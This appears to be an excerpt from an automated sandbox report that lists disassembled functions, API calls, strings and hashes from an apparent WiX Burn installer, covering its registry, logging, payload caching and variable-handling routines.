Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CapsCreateDeviceFromGdipMonitor$AllocBitmapCursorInfoPointReleaseResource_memset
String ID: DISPLAY$Failed to find the splash screen bitmap.$Failed to load the splash screen bitmap.$splashscreen.cpp
API String ID: 1792097070-2523976841
Opcode ID: e364b1c751f55ed969d013d9781c1c17a1560ac34527837123605764f3600cd2
Instruction ID: fef21f3428e89acb94ce4eac51897ed67c33660b7dfbfe6efbb2cbca031adb14
Opcode Fuzzy Hash: e364b1c751f55ed969d013d9781c1c17a1560ac34527837123605764f3600cd2
Instruction Fuzzy Hash: DE418D71A0070A9FD720DFB9DC86F9EBBF9AB44704F14852DE615EB291EB70E9048B40

Function 00C9785D Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 140registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C97891
RegCloseKey.ADVAPI32(?,00000000,?,?,00C98BA0,?), ref: 00C979E7

Part of subcall function 00CC3DFC: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00CC7B1F,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC3E10

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C978D9
RegQueryValueExW.ADVAPI32(?,?,00000000,00C98BA0,00000000,00000000,?,?,?,00000000,?,?,00000001,?,?,?), ref: 00C97926

Strings

Registry key not found. Key = '%ls'; variable = '%ls', xrefs: 00C978FC
Failed to format key string., xrefs: 00C9789C
RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 00C979B6
Failed to set variable., xrefs: 00C979A1
search.cpp, xrefs: 00C97957
Failed to format value string., xrefs: 00C978E4
Failed to query registry key value., xrefs: 00C97961
Failed to open registry key. Key = '%ls', xrefs: 00C97906
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 00C9796E

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Open@16$CloseOpenQueryValue
String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'; variable = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
API String ID: 3932663376-1654530643
Opcode ID: c9ad2e9847195b7b88ff8703bf4d287d31e2229aaec160854c9e24a7b52a7914
Instruction ID: 321090ffcd61b6ffcc5db4dea9ac5e61e03c0811ecc01d5b205dc018d8ead06b
Opcode Fuzzy Hash: c9ad2e9847195b7b88ff8703bf4d287d31e2229aaec160854c9e24a7b52a7914
Instruction Fuzzy Hash: 2841A2B2916209FFDF11AFD4CC8AEAEBBB6EB44700F21427EF21162151D6724B51AB11

Function 00CA1DE9 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 118COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA1E0D
GetTempPathW.KERNEL32(00000104,?,?,00000001,00000009), ref: 00CA1E3A
GetLastError.KERNEL32(?,00000001,00000009), ref: 00CA1E44
GetCurrentProcessId.KERNEL32(?,?,00000104,?,?,00000001,00000009), ref: 00CA1EA8
ProcessIdToSessionId.KERNEL32(00000000,?,00000001,00000009), ref: 00CA1EAF

Strings

Failed to get temp folder., xrefs: 00CA1E73
%u\, xrefs: 00CA1EC9
Failed to format session id as a string., xrefs: 00CA1EDD
Failed to copy temp folder., xrefs: 00CA1F5A
Failed to get length of temp folder., xrefs: 00CA1E97
Failed to get length of session id string., xrefs: 00CA1F01
logging.cpp, xrefs: 00CA1E69

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Process$CurrentErrorLastPathSessionTemp_memset
String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$logging.cpp
API String ID: 1047854834-1016737523
Opcode ID: 6793ee32fcf4430adb2ec8f338724187e2683ac1fb4e677ff97d94fccecb1982
Instruction ID: 32c1c5906f2970a693efcccd6fe182fa4b44fa6ed2ccfa2ffe142f2b99bebc27
Opcode Fuzzy Hash: 6793ee32fcf4430adb2ec8f338724187e2683ac1fb4e677ff97d94fccecb1982
Instruction Fuzzy Hash: C7418371D8016DAACF20ABA5CC4DEEEB7B8AB21315F1805E6E819F3151E7704E809F91

Function 00CA0611 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 200COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA062B

Strings

Failed to read variables., xrefs: 00CA071F
Failed to find package: %ls, xrefs: 00CA075A
Failed to read action., xrefs: 00CA067B
Failed to read the list of dependencies to ignore., xrefs: 00CA06DE
Failed to read the list of ancestors., xrefs: 00CA06FF
Failed to read exe package execution mode., xrefs: 00CA06BD
Failed to allocate the list of dependencies to ignore., xrefs: 00CA0787
Failed to execute EXE package., xrefs: 00CA07D3
Failed to allocate the list of ancestors., xrefs: 00CA07AB
Failed to read exe package., xrefs: 00CA065A
Failed to read rollback., xrefs: 00CA069C

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to allocate the list of ancestors.$Failed to allocate the list of dependencies to ignore.$Failed to execute EXE package.$Failed to find package: %ls$Failed to read action.$Failed to read exe package execution mode.$Failed to read exe package.$Failed to read rollback.$Failed to read the list of ancestors.$Failed to read the list of dependencies to ignore.$Failed to read variables.
API String ID: 2102423945-2912315823
Opcode ID: 8b73a8a57ae6c9e8270feafff4d2d4a5b2bf4a43e7cc9605b2cd63f72cbe5d4d
Instruction ID: 2f3298fb1f104efc90d09f52f4caa993f53cca7d3a779deff67c7ed43010b285
Opcode Fuzzy Hash: 8b73a8a57ae6c9e8270feafff4d2d4a5b2bf4a43e7cc9605b2cd63f72cbe5d4d
Instruction Fuzzy Hash: EE516972C0051AFFCF11EA95C881CFEB7BCAB55398B210266F921F3150E6315E91ABA1

Function 00C99DF9 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 151COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,00C91D56,00000000,00000000,?,00C9A785,00C9222A,00C91E8E,00000000,00000001), ref: 00C99E06

Part of subcall function 00C98EB9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,?,000000FF,?,00000000,00000030,00C99885,?,00C9AE46,?,00000030,00000000,00000030), ref: 00C98EF2

LeaveCriticalSection.KERNEL32(00000001,00000008,WixBundleElevated,00000001,00000000,00000000,?,00C9A785,00C9222A,00C91E8E,00000000,00000001), ref: 00C99F88

Strings

Setting numeric variable '%ls' to value %lld, xrefs: 00C99F4D
Setting string variable '%ls' to value '%ls', xrefs: 00C99F34
Failed to insert variable '%ls'., xrefs: 00C99E56
Attempt to set built-in variable value: %ls, xrefs: 00C99E9B
Failed to find variable value '%ls'., xrefs: 00C99E24
Setting hidden variable '%ls', xrefs: 00C99ECD
Failed to set value of variable: %ls, xrefs: 00C99F76
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00C99F0E
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00C99F9C
Unsetting variable '%ls', xrefs: 00C99F29
variable.cpp, xrefs: 00C99E8E
WixBundleElevated, xrefs: 00C99E37

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$CompareEnterLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$WixBundleElevated$variable.cpp
API String ID: 2612025200-3866887438
Opcode ID: 49cb3c701f4a51a77c7244ee37f5054cbf80d37906eac4bb6940aec8ac8c71d8
Instruction ID: f6f17f1b77bf833d0b0357539a7289de4366d5f5b8def403550fe41651ad63f8
Opcode Fuzzy Hash: 49cb3c701f4a51a77c7244ee37f5054cbf80d37906eac4bb6940aec8ac8c71d8
Instruction Fuzzy Hash: E151F131640219BBDF119F98CC4AFAABB64EF14311F10812EFD199A291D332DE10EB92

Function 00CA9264 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 120fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,?,00CA9BE2,00000000,?,?,00000000), ref: 00CA927F
GetLastError.KERNEL32(?,?,00CA9BE2,00000000,?,?,00000000,00000001,?,?,00000000,00000000,00000000,?,?,00C9F27A), ref: 00CA928D

Part of subcall function 00CA8281: _memset.LIBCMT ref: 00CA82AB

Part of subcall function 00CC6090: Sleep.KERNEL32(00000000,?,?,00CA7B8D,00000000,?,00000001,00000003,000007D0,?,?,00CA9CB8,00000000,00000000,00000000,00000000), ref: 00CC60A7

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000003,000007D0,?,?), ref: 00CA9396

Strings

Copying, xrefs: 00CA9335, 00CA933F
cache.cpp, xrefs: 00CA92B2
Failed to move %ls to %ls, xrefs: 00CA936F
Moving, xrefs: 00CA932E
Failed to copy %ls to %ls, xrefs: 00CA9385
Failed to open payload in working path: %ls, xrefs: 00CA92BD
%ls payload from working path '%ls' to path '%ls', xrefs: 00CA9340
Failed to verify payload signature: %ls, xrefs: 00CA92F6
Failed to verify payload hash: %ls, xrefs: 00CA931A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep_memset
String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
API String ID: 2828417756-1604654059
Opcode ID: d438cc739d1f74177adf78a3cbc9fd13ef73e79ac2c5e4c5cfb2356c369f274d
Instruction ID: 7105849c53678fe1f2218960025eb04726823773fbfc3b158accd75c9f1243f1
Opcode Fuzzy Hash: d438cc739d1f74177adf78a3cbc9fd13ef73e79ac2c5e4c5cfb2356c369f274d
Instruction Fuzzy Hash: B8312471A82226BBDE311665CC0BF6F792CEF53B59F110225F905BA2D0DA75CE0096E1

Function 00CA43A6 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 280COMMON

Download Yara Rule

Strings

plan.cpp, xrefs: 00CA46A4
Failed to copy self to related bundle ancestors., xrefs: 00CA4697
Failed to copy ancestors and self to related bundle ancestors., xrefs: 00CA44B6
Failed to create dictionary from ancestors array., xrefs: 00CA4403
Unexpected relation type encountered during plan: %d, xrefs: 00CA4686
%ls;%ls, xrefs: 00CA449E
Failed to add the package provider key "%ls" to the planned list., xrefs: 00CA46BF
Failed to create string array from ancestors., xrefs: 00CA43E2
Failed to lookup the bundle ID in the ancestors dictionary., xrefs: 00CA4690
UX aborted plan related bundle., xrefs: 00CA46AE

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID:
String ID: %ls;%ls$Failed to add the package provider key "%ls" to the planned list.$Failed to copy ancestors and self to related bundle ancestors.$Failed to copy self to related bundle ancestors.$Failed to create dictionary from ancestors array.$Failed to create string array from ancestors.$Failed to lookup the bundle ID in the ancestors dictionary.$UX aborted plan related bundle.$Unexpected relation type encountered during plan: %d$plan.cpp
API String ID: 0-489706565
Opcode ID: 332479c57cee6eb990f508e0d6950b650ddd466db4402c37a56d9db226c39681
Instruction ID: 5c04b068d30b8eb1b6d184332e4b0b7225b88b99f25520526385354634af42f6
Opcode Fuzzy Hash: 332479c57cee6eb990f508e0d6950b650ddd466db4402c37a56d9db226c39681
Instruction Fuzzy Hash: 48A19F70A00307EFDF28DF94C885FAAB7B5FF96309F20442AF561A6251D7B19A50DB11

Function 00C9909F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C990CD

Part of subcall function 00C99028: _memset.LIBCMT ref: 00C99040
Part of subcall function 00C99028: GetVersionExW.KERNEL32(?,?,00000000,00C990EC), ref: 00C9904F
Part of subcall function 00C99028: GetLastError.KERNEL32 ref: 00C99059

GetLastError.KERNEL32 ref: 00C990F0

Strings

Failed to get OS info., xrefs: 00C9911F
Failed to set variant value., xrefs: 00C99275
variable.cpp, xrefs: 00C99115

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast_memset$Version
String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
API String ID: 3644159973-1971907631
Opcode ID: bda6122159f477384107a5a27ecc42e8f4b09094f3b53950934d3eb5ad37840d
Instruction ID: e78791d92a99fb6eecd67ceae12ad096e119b9a79fe33f931d66f1d59cef0b24
Opcode Fuzzy Hash: bda6122159f477384107a5a27ecc42e8f4b09094f3b53950934d3eb5ad37840d
Instruction Fuzzy Hash: 2C51B5B1A00229BBDF209B6DCC4DFEE7BB8EB89710F5044AEF545E6180D6348E81DB51

Function 00CA9159 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,00000000,?,?,00CA9B62,?,?,?,?,00000000), ref: 00CA9173
GetLastError.KERNEL32(?,?,00CA9B62,?,?,?,?,00000000,00000000,00000000,?,?,00C9F25B,?,?,?), ref: 00CA9183

Part of subcall function 00CC6090: Sleep.KERNEL32(00000000,?,?,00CA7B8D,00000000,?,00000001,00000003,000007D0,?,?,00CA9CB8,00000000,00000000,00000000,00000000), ref: 00CC60A7

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000003,000007D0,?,?,?), ref: 00CA9257

Strings

Copying, xrefs: 00CA91F9, 00CA9200
cache.cpp, xrefs: 00CA91A8
Failed to move %ls to %ls, xrefs: 00CA9230
Moving, xrefs: 00CA91F2
Failed to open container in working path: %ls, xrefs: 00CA91B3
Failed to verify container hash: %ls, xrefs: 00CA91DE
Failed to copy %ls to %ls, xrefs: 00CA9246
%ls container from working path '%ls' to path '%ls', xrefs: 00CA9201

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
API String ID: 1275171361-1187406825
Opcode ID: ba291bf572ccc266485015fee8375714ab98c3b4967379f0afd51f001f1928fa
Instruction ID: 40b20fe87720e22a075a5c6281daae7aa668261ca3abbba0a7341cca5b59f38d
Opcode Fuzzy Hash: ba291bf572ccc266485015fee8375714ab98c3b4967379f0afd51f001f1928fa
Instruction Fuzzy Hash: 6F21D871A80626B6EA3122658D4BF2F296CDF92F55F100129FB05BA3C0E6B5DE0051B5

Function 00CC651B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 252fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,00000001,000000F9,00000000,00000000,?,?,?), ref: 00CC6599
GetLastError.KERNEL32 ref: 00CC65A7
GetFileSizeEx.KERNEL32(?,?), ref: 00CC660E
GetLastError.KERNEL32 ref: 00CC6618
SetFilePointer.KERNEL32(?,?,?,00000001), ref: 00CC666F
GetLastError.KERNEL32 ref: 00CC667A
ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,00000001), ref: 00CC6746
GetLastError.KERNEL32 ref: 00CC678B
CloseHandle.KERNEL32(000000FF), ref: 00CC67E4

Strings

fileutil.cpp, xrefs: 00CC653C, 00CC65EE, 00CC6639, 00CC67B0

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandlePointerReadSize
String ID: fileutil.cpp
API String ID: 1273122604-2967768451
Opcode ID: 5d1303e9b528ac107bbf62d279ec8396864648ad41d5334c804973c5299890b7
Instruction ID: 119a6cbcd098716ddf1c5cab748edb54b268abb94f54bf82b73c69a6d6054caa
Opcode Fuzzy Hash: 5d1303e9b528ac107bbf62d279ec8396864648ad41d5334c804973c5299890b7
Instruction Fuzzy Hash: 52811772640206EBDF209F65CE89F6F37A5AB80724F25453DF921EB280DB74CD419B61

Function 00CA545F Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 203COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,?,000000FF,00C91703,000000FF,?,00000000,00C91703), ref: 00CA5499
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00C9139F,00C9139F,00C9139F,00C9139F,?,00000000), ref: 00CA5642
GetLastError.KERNEL32 ref: 00CA564F

Strings

Failed to append payload cache action., xrefs: 00CA562D
Failed to append rollback cache action., xrefs: 00CA5571
plan.cpp, xrefs: 00CA5679
(, xrefs: 00CA54A6
Failed to append package start action., xrefs: 00CA5516
Failed to append cache action., xrefs: 00CA5625
Failed to create syncpoint event., xrefs: 00CA5683

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareCreateErrorEventLastString
String ID: ($Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
API String ID: 801187047-794669014
Opcode ID: a05394c640af92955acf4e6ef572c079ee59216d10225a545268bb4acb5ce872
Instruction ID: d41d13bafe66f1d66a21abb74f5550be215dc372198c575f083df87d8e367518
Opcode Fuzzy Hash: a05394c640af92955acf4e6ef572c079ee59216d10225a545268bb4acb5ce872
Instruction Fuzzy Hash: 89811874A0070AEFCB14DFA5C895A9EBBF5FF0A308F5085AAE515DB251E770EA40DB10

Function 00CC26A0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 195sleepfiletimeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC26EF
GetTempPathW.KERNEL32(00000104,?,00000001,00000009,00000000), ref: 00CC273E
GetLastError.KERNEL32 ref: 00CC2748
GetLocalTime.KERNEL32(?,?,?,?,00000000,?), ref: 00CC27E1
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00CC2871
GetLastError.KERNEL32 ref: 00CC2882
Sleep.KERNEL32(00000064), ref: 00CC2894
CloseHandle.KERNEL32(000000FF), ref: 00CC2903

Strings

%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00CC2843
pathutil.cpp, xrefs: 00CC276D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime_memset
String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 820914711-1101990113
Opcode ID: 61728b8d853dabfe44f90bfa19f5015dba8940000f2e6cc92316a340bb45aa7e
Instruction ID: 501caccf63a47f018b1345a82f86876fcbea32a61d687ec9d3f6631d0edc7e40
Opcode Fuzzy Hash: 61728b8d853dabfe44f90bfa19f5015dba8940000f2e6cc92316a340bb45aa7e
Instruction Fuzzy Hash: CB716572940229AADB319FA5DC89FADB7B8EB48710F1006E9F529E6190E7354EC0DF50

Function 00C951C5 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 147COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFFFEE3,000000FF,00C9214E,000000FF,00C9214E,00C91F0E,00C9214E,00C921DA,00C91E8E,00000000,00C921DA,00C91E8E,00C91E22,F08B8007), ref: 00C95233

Strings

Failed to get next stream., xrefs: 00C9531D
Failed to ensure directory exists, xrefs: 00C9533D
Failed to extract file., xrefs: 00C95344
Payload was not found in container: %ls, xrefs: 00C9530D
X, xrefs: 00C95242
Failed to get directory portion of local file path, xrefs: 00C95336
Failed to find embedded payload: %ls, xrefs: 00C95327
Failed to concat file paths., xrefs: 00C9532F
payload.cpp, xrefs: 00C952FF

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$X$payload.cpp
API String ID: 1825529933-3888727562
Opcode ID: a90504f565d155f5002385d18c1753577702aa54c8b3dfc5123695c4f2d3cc23
Instruction ID: 5c7eb0fcb5e282fa5d439df2c74430e2c3bdfb27f91ee39995e804fff1fa8359
Opcode Fuzzy Hash: a90504f565d155f5002385d18c1753577702aa54c8b3dfc5123695c4f2d3cc23
Instruction Fuzzy Hash: F741C531900E05EBCF129F56CC49F9E77B1BF84790F258069F925AB1A1D771DA41EB40

Function 00CA7D6C Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 126COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA7D9A
LocalFree.KERNEL32(?,?,00000001,80000005,?,00000000,?,00000000,00000003,000007D0), ref: 00CA7ED4

Strings

Failed to allocate access for Administrators group to path: %ls, xrefs: 00CA7DC7
cache.cpp, xrefs: 00CA7E71
Failed to allocate access for SYSTEM group to path: %ls, xrefs: 00CA7DE8
Failed to create ACL to secure cache path: %ls, xrefs: 00CA7E81
Failed to allocate access for Users group to path: %ls, xrefs: 00CA7E2F
Failed to secure cache path: %ls, xrefs: 00CA7EB8
Failed to allocate access for Everyone group to path: %ls, xrefs: 00CA7E0E

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: FreeLocal_memset
